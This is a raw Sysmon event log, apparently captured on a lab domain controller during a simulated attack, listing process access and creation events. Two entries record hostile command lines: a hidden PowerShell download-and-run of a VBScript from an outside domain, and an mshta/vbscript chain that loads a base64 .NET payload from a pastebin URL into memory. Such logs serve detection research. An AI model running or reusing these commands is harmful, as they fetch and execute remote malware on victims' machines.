07:59:20.262{58E9C193-B458-615A-1E02-00000000FC01}55842228C:\Windows\system32\conhost.exe{58E9C193-B458-615A-2602-00000000FC01}2532C:\Windows\system32\PING.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106349Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.252{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106348Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.252{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106347Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.252{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106346Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.252{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106345Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.252{58E9C193-AE62-615A-B200-00000000FC01}32122980C:\Windows\system32\csrss.exe{58E9C193-B458-615A-2602-00000000FC01}2532C:\Windows\system32\PING.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000106344Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.247{58E9C193-B458-615A-1D02-00000000FC01}42925540C:\Windows\System32\cmd.exe{58E9C193-B458-615A-2602-00000000FC01}2532C:\Windows\system32\PING.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\cmd.exe+f1e1|C:\Windows\System32\cmd.exe+11a37|C:\Windows\System32\cmd.exe+cb0d|C:\Windows\System32\cmd.exe+c295|C:\Windows\System32\cmd.exe+8564|C:\Windows\System32\cmd.exe+c347|C:\Windows\System32\cmd.exe+f916|C:\Windows\System32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000106343Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.252{58E9C193-B458-615A-2602-00000000FC01}2532C:\Windows\System32\PING.EXE10.0.14393.0 (rs1_release.160715-1616)TCP/IP Ping CommandMicrosoft® Windows® Operating SystemMicrosoft Corporationping.exeping 127.0.0.1 -n 10 C:\Temp\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92HighMD5=7B647B55695ACE1E99158F79AB3AF51A,SHA256=ED7FA5B3CCBDD31A9E83F7C59F78AB5E2C83C7FEEDCC5F8B95948D11EBD7FF34,IMPHASH=5AAE2D3679223F82E19660D380B78FB5{58E9C193-B458-615A-1D02-00000000FC01}4292C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 > nul & mshta.exe vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/H2JdYYVV').replace('#$$','A'))).EntryPoint.Invoke($N,$N)",0,true)(window.close) 10341000x8000000000000000106342Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.247{58E9C193-AE66-615A-C000-00000000FC01}46564748C:\Windows\system32\taskhostw.exe{58E9C193-B457-615A-1602-00000000FC01}2000C:\Windows\System32\WScript.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106341Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.222{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B457-615A-1602-00000000FC01}2000C:\Windows\System32\WScript.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62890|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106340Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.222{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B457-615A-1602-00000000FC01}2000C:\Windows\System32\WScript.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+6284c|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106339Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.222{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B457-615A-1602-00000000FC01}2000C:\Windows\System32\WScript.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62820|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106338Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.222{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B457-615A-1602-00000000FC01}2000C:\Windows\System32\WScript.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+f5319|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106337Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.193{58E9C193-ACA7-615A-1100-00000000FC01}3601664C:\Windows\system32\svchost.exe{58E9C193-B458-615A-2502-00000000FC01}2792C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106336Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.193{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B458-615A-2502-00000000FC01}2792C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106335Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.174{58E9C193-B458-615A-2502-00000000FC01}2792848C:\Windows\system32\conhost.exe{58E9C193-B458-615A-2402-00000000FC01}5420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000106334Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.164{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2BEB39FEB037F2246F21CDA0437AEF57,SHA256=C589F8E676A84B22C502540163155BC110524ABA0BD935FDA5136EBC3CD22FEA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000106333Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.164{58E9C193-ACA7-615A-1100-00000000FC01}3601664C:\Windows\system32\svchost.exe{58E9C193-B458-615A-2202-00000000FC01}5588C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106332Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.164{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B458-615A-2202-00000000FC01}5588C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106331Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.144{58E9C193-B458-615A-2202-00000000FC01}55885696C:\Windows\system32\conhost.exe{58E9C193-B458-615A-2102-00000000FC01}5760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106330Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.144{58E9C193-AE62-615A-B200-00000000FC01}32123188C:\Windows\system32\csrss.exe{58E9C193-B458-615A-2502-00000000FC01}2792C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000106329Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.139{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106328Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.139{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106327Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.139{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106326Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.139{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106325Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.134{58E9C193-ACA7-615A-1100-00000000FC01}3601664C:\Windows\system32\svchost.exe{58E9C193-B458-615A-2002-00000000FC01}5324C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106324Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.134{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B458-615A-2002-00000000FC01}5324C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106323Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.134{58E9C193-AE62-615A-B200-00000000FC01}32122980C:\Windows\system32\csrss.exe{58E9C193-B458-615A-2402-00000000FC01}5420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000106322Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.134{58E9C193-B457-615A-1602-00000000FC01}20006124C:\Windows\System32\WScript.exe{58E9C193-B458-615A-2402-00000000FC01}5420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+a909f|C:\Windows\System32\windows.storage.dll+a8d15|C:\Windows\System32\windows.storage.dll+a8806|C:\Windows\System32\windows.storage.dll+a9c78|C:\Windows\System32\windows.storage.dll+a862e|C:\Windows\System32\windows.storage.dll+ab445|C:\Windows\System32\windows.storage.dll+ab7c4|C:\Windows\System32\windows.storage.dll+aae00|C:\Windows\System32\SHELL32.dll+3ccff|C:\Windows\System32\SHELL32.dll+3cb8c|C:\Windows\System32\SHELL32.dll+dcb2e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000106321Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.135{58E9C193-B458-615A-2402-00000000FC01}5420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://libya2020.com.ly/google0rvi.mp3','C:\Users\ADMINI~1\AppData\Local\Temp\HsUCsYfsgsd5Q1.vbs');Start-Process 'C:\Users\ADMINI~1\AppData\Local\Temp\HsUCsYfsgsd5Q1.vbs'C:\Temp\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{58E9C193-B457-615A-1602-00000000FC01}2000C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\_______ _____ ___ ______ ______.vbs" 10341000x8000000000000000106320Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.129{58E9C193-B457-615A-1802-00000000FC01}25841440C:\Windows\system32\conhost.exe{58E9C193-B458-615A-2302-00000000FC01}6876C:\Windows\system32\PING.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106319Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.124{58E9C193-AE62-615A-B200-00000000FC01}32122980C:\Windows\system32\csrss.exe{58E9C193-B458-615A-2202-00000000FC01}5588C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000106318Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.119{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106317Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:20.119{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106316Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 